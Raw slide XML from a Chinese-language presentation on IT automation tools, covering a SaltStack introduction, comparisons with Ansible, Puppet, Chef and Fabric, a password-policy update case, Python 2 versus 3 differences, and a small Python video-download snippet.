              <a:t>"Mozilla/5.0 (Windows NT 6.3; WOW64) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>AppleWebKit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>randdom_header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>random.choice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>my_headers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req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>urllib.request.Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>get_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(1))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>req.add_header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>("User-Agent",</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>randdom_header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 err="1"/>
              <a:t>req.add_header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>("GET",</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>get_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(1))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>异常处理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>     for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>x,y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> in zip(mp4_url,mp4_name):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>         download(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>x,y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except Exception as e:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>     print(e)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997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牛皮纸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3812" r="3680" b="4240"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3438967" y="1203598"/>
            <a:ext cx="4373393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28957"/>
            <a:ext cx="334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自动化运维</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="167682">
            <a:off x="4158600" y="1767658"/>
            <a:ext cx="3272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  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>自动化运维工具简介</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea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+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Saltstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>介绍</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea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  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>案例演示</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea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9582"/>
            <a:ext cx="2442209" cy="24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95536" y="113785"/>
            <a:ext cx="255587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自动化运维管理工具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2DC244E-4EBF-4017-AD8D-BE4E60EE9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39747"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="800716" y="804738"/>
          <a:ext cx="7443692" cy="3672408"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1860923">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4202912729"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1860923">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2764148014"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1860923">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="568328229"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1860923">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3415730883"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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11144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Puppet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Ruby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C/S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72618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Chef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Ruby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C/S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97862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abric</a:t>
                      </a:r>
                      <a:endParaRPr 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C/S(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Client)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274472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Ansible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Client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491272"/>
                  </a:ext>
                </a:extLst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Saltstack</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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C/S(</a:t>
                      </a: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可无</a:t>
                      </a:r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Client)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SSH/ZMQ/RAET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91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0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13965" y="127858"/>
            <a:ext cx="3205907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自动化运维 三剑客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2BFF959-5189-44F8-91E2-9244E1E00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30647"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="530379" y="1344522"/>
          <a:ext cx="3565947" cy="3388748"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="975723">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3700388037"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="752469">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="94135611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140839420"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1045667">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1233290392"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Key</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="67882" marR="67882" marT="67882" marB="6788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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Salt</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="67882" marR="67882" marT="67882" marB="6788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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Ansible</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="67882" marR="67882" marT="67882" marB="6788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dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>备注</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="67882" marR="67882" marT="67882" marB="67882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7252992"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="315901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effectLst/>
                        </a:rPr>
                        <a:t>公司支持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1" u="sng" strike="noStrike" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>SaltStack</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" u="sng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1" u="sng" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Ansible</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" u="sng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200" dirty="0"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086619"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="310725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effectLst/>
                        </a:rPr>
                        <a:t>开源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1" u="sng" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Salt</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" u="sng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1" u="sng" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Ansible</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" u="sng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200" dirty="0"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90374"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="310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Star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7140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20199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zh-CN" altLang="en-US" sz="1200" dirty="0">
                        <a:effectLst/>
                      </a:endParaRP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859090"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="6673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effectLst/>
                        </a:rPr>
                        <a:t>Opend</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> Pull requests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43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621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effectLst/>
                        </a:rPr>
                        <a:t>侧面说明社区解决问题的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>速度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783889"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="6673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effectLst/>
                        </a:rPr>
                        <a:t>Opend</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> Issues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4026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621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effectLst/>
                        </a:rPr>
                        <a:t>可以从侧面说明产品</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>稳定性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9264"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="66739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Contributors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dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1665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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2301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dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>可以从侧面说明社区</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B0F0"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>活跃度</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="67882" marR="67882" marT="67882" marB="6788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747602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B0FAD2E1-18EB-4250-ADB1-7E2FBE554D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2355437"/>
            <a:ext cx="4426029" cy="22987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C7C932-1A30-4254-8CA9-05D083E144CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240104" y="637302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Fabric </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>SaltStack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>Ansible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>并非一个级别，只适合做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>10~20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>台较少的服务器管理</a:t>
            </a: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Ansible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>协议传输数据，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>SaltStack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>使用消息队列</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>ZeroMQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>传输数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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9730837-B10A-4454-8379-E8A130B59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98280"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4386601" y="1344522"/>
          <a:ext cx="3721100" cy="89154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03333">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2417459388"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1496047">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="26673489"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1321720">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3683635908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连通性测试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SaltStack</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" u="none" strike="noStrike" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ZeroMQ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Ansible</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> SSH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51856236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real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0m2.146s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0m25.572s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44244175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user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0m1.413s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0m35.943s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1547573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sys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0m0.135s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0m19.950s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31834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9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13965" y="127858"/>
            <a:ext cx="3205907" cy="40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saltstack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参考书目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3" y="599107"/>
            <a:ext cx="3062336" cy="40839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2164" r="1493"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3995936" y="900398"/>
            <a:ext cx="4680520" cy="34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51520" y="120431"/>
            <a:ext cx="3205907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SaltStack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774DA6-1138-4B1D-A91C-E8B15854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2697"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4067944" y="595313"/>
            <a:ext cx="4850409" cy="403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D56981-996B-4093-9198-70BBE4F153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75"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="187782" y="843558"/>
            <a:ext cx="3807718" cy="28872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FCD6B4-AFBA-4BF2-AFFB-3D9B52D888FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="3975018"/>
            <a:ext cx="403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ZeroMQ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  YAML  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Jinja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模板   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Grains Pillar </a:t>
            </a:r>
          </a:p>
          <a:p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sls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状态文件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不要被新名词唬住！ </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30055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109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13965" y="127858"/>
            <a:ext cx="399799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SaltStack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案列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更新密码策略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C7C932-1A30-4254-8CA9-05D083E144CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240104" y="637302"/>
            <a:ext cx="85689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配置文件更新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统密码策略</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>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login.defs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>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pam.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>/system-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>auth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>编辑配置文件修改，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Redhat5.8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>与 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Redhat6.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> 支持的加密方式不一样，配置文件有区别。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组策略更新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>密码策略</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>gpedit.msc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>手工修改。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961CA0-173D-4A86-8217-1A793A3A8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4" y="2590065"/>
            <a:ext cx="7162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4865" y="1028982"/>
            <a:ext cx="2007079" cy="3621475"/>
          </a:xfr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python2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区别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+mn-lt"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、去除了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>long</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>类型</a:t>
            </a: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en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>print()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>为内置函数</a:t>
            </a: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en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、整型除法返回浮点数，</a:t>
            </a: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zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>整除用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>!= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>取代 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt; &gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、废除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>xrange</a:t>
            </a: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endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:latin typeface="+mn-lt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rgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、对 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bytes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>和 原生 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>unicode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>字符串的支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>删除了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>unicode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
